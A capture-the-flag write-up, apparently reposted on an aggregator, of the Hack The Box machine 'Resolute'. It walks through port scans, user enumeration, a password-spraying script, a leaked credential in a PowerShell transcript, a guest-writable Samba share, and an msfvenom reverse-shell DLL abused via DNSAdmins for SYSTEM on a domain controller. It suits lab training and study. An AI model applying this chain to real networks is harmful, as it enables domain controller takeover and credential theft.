内容简介:This post documents the complete walkthrough of Resolute, a retired vulnerableResolute is a retired vulnerable VM from Hack The Box.Let’s start with a
This post documents the complete walkthrough of Resolute, a retired vulnerable VM created by egre55 , and hosted at Hack The Box . If you are uncomfortable with spoilers, please stop reading now.
On this post
- Information Gathering
-
- PowerShell transcript
- DNSAdmin to DC compromise
- File share accessible by
Everyone
- Reverse shell payload generated by
msfvenom
- I got
SYSTEM
shell yo!
- File share accessible by
Background
Resolute is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan
probe to establish the open ports in the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.169 --rate=1000 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2019-12-09 11:13:14 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 61463/udp on 10.10.10.169 Discovered open port 3269/tcp on 10.10.10.169 Discovered open port 88/tcp on 10.10.10.169 Discovered open port 49677/tcp on 10.10.10.169 Discovered open port 49667/tcp on 10.10.10.169 Discovered open port 9389/tcp on 10.10.10.169 Discovered open port 636/tcp on 10.10.10.169 Discovered open port 52115/udp on 10.10.10.169 Discovered open port 445/tcp on 10.10.10.169 Discovered open port 49664/tcp on 10.10.10.169 Discovered open port 53/tcp on 10.10.10.169 Discovered open port 139/tcp on 10.10.10.169 Discovered open port 593/tcp on 10.10.10.169 Discovered open port 49676/tcp on 10.10.10.169 Discovered open port 55256/udp on 10.10.10.169 Discovered open port 54973/udp on 10.10.10.169 Discovered open port 5985/tcp on 10.10.10.169 Discovered open port 49665/tcp on 10.10.10.169 Discovered open port 464/tcp on 10.10.10.169 Discovered open port 47001/tcp on 10.10.10.169 Discovered open port 49666/tcp on 10.10.10.169 Discovered open port 3268/tcp on 10.10.10.169 Discovered open port 49688/tcp on 10.10.10.169 Discovered open port 56921/udp on 10.10.10.169
Whoa, it’s a Windows machine alright. Just look at the number of open ports. Let’s do one better with nmap
scanning the discovered ports below 47001 to establish their services.
# nmap -n -v -Pn -p53,88,139,445,464,593,636,3268,3269,5985,9389 -A --reason -oN nmap.txt 10.10.10.169 ... PORT STATE SERVICE REASON VERSION 53/tcp open domain? syn-ack ttl 127 | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2019-12-09 11:38:42Z) 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK) 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 127 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing ... Host script results: |_clock-skew: mean: 2h47m02s, deviation: 4h37m10s, median: 7m01s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Resolute | NetBIOS computer name: RESOLUTE\x00 | Domain name: megabank.local | Forest name: megabank.local | FQDN: Resolute.megabank.local |_ System time: 2019-12-09T03:39:14-08:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2019-12-09T11:39:12 |_ start_date: 2019-12-09T11:07:16
Let’s see what we can glean from rpcclient
with enumdomusers
.
That’s a lot of users. We can use some bash
-fu to query all users using rpcclient
as the main driver.
for user in $(cat users.txt); do rpcclient 10.10.10.169 -U% -c "queryuser $user" 2>/dev/null && echo; done | tee userinfo.txt
Something is amiss. Looks like the administrator has forgotten to remove the default password in the description.
With that in mind, let’s write a simple script to test which user hasn’t changed the password yet.
brute.sh
#!/bin/bash DOMAIN=megabank.local HOST=10.10.10.169 NAME=RESOLUTE USER=$1 PASS=$2 function die() { killall perl 2>/dev/null } if smbclient -I $HOST -L $NAME -U "$DOMAIN/$USER%$PASS" &>/dev/null; then echo "[*] User found: $USER" echo "[*] Password found: $PASS" die fi
So melanie
is the one!
Low-Privilege Shell
Armed with melanie
’s password, let’s see if she can log in to the remote machine via WinRM. Enter Evil-WinRM .
Bingo!
The file user.txt
is at melanie’s desktop.
Privilege Escalation
During enumeration of melanie
’s account, I notice that the presence of PowerShell transcript at C:\PSTranscripts
.
PowerShell transcript
What is PowerShell transcript? A PowerShell transcript is a simple text file that contains a history of all commands and their output. It’s almost like Get-History
which only displays the input commands; inputs and outputs of all sessions are recorded in the transcript.
Guess who turned it on?
And what have we here?
ryan’s password Serv3r4Admin4cc123!
.
PowerShell Remoting
Armed with ryan
’s password, we can PS remote into his account like so.
And from there spawn a basic command prompt, just to keep things in check.
DNSAdmin to DC compromise
During enumeration of ryan
’s account, I notice that ryan
is in the DNSAdmins group.
According to this article , in addition to implementing their own DNS server, Microsoft also implemented their own management protocol for it, to allow for easy management and integration with Active Directory domains. As such, it allows us, under some circumstances, to run code as SYSTEM on domain controllers, without being a domain admin.
Long story short, it basically involves injecting a DLL of our choice into dns.exe
, the executable behind the DNS Service. It all stems from the fact that dns.exe
doesn’t validate the path in ServerLevelPluginDll
. Read the article for all the gory details!
Let’s get to work. We need a few things:
Everyone msfvenom
File share accessible by Everyone
Here’s the smb.conf
I use. Take note the directory permissions has to be identical to the one in the configuration file, e.g. 777
.
smb.conf
[global] workgroup = WORKGROUP server string = Samba Server %v netbios name = kali security = user map to guest = bad user name resolve order = bcast host dns proxy = no bind interfaces only = yes [evil] path = /root/Downloads/resolute/tmp writable = yes guest ok = yes guest only = yes read only = yes create mode = 0777 directory mode = 0777 force user = nobody
Reverse shell payload generated by msfvenom
The reverse shell payload is located at /root/Downloads/resolute/tmp
, i.e. the file share.
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.183 LPORT=4321 -f dll -o evil.dll
I got SYSTEM
shell yo!
I didn’t notice it before but ryan
is also in Remote Management Users group. As such, we can also use Evil-WinRM to get a shell.
With that, we can launch the attack with dnscmd.exe
, which is only available in PowerShell for some reason.
Launch the attack like so.
Notice the UNC path points to my file share. We just need to restart the DNS service and a reverse shell with SYSTEM privilege appears in my nc
listener.
Awesome!
Getting root.txt
Getting root.txt
with a SYSTEM
is a piece of cake.
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Getting Real
Jason Fried、Heinemeier David Hansson、Matthew Linderman / 37signals / 2009-11-18 / USD 24.99
Getting Real details the business, design, programming, and marketing principles of 37signals. The book is packed with keep-it-simple insights, contrarian points of view, and unconventional approaches......一起来看看 《Getting Real》 这本书的介绍吧!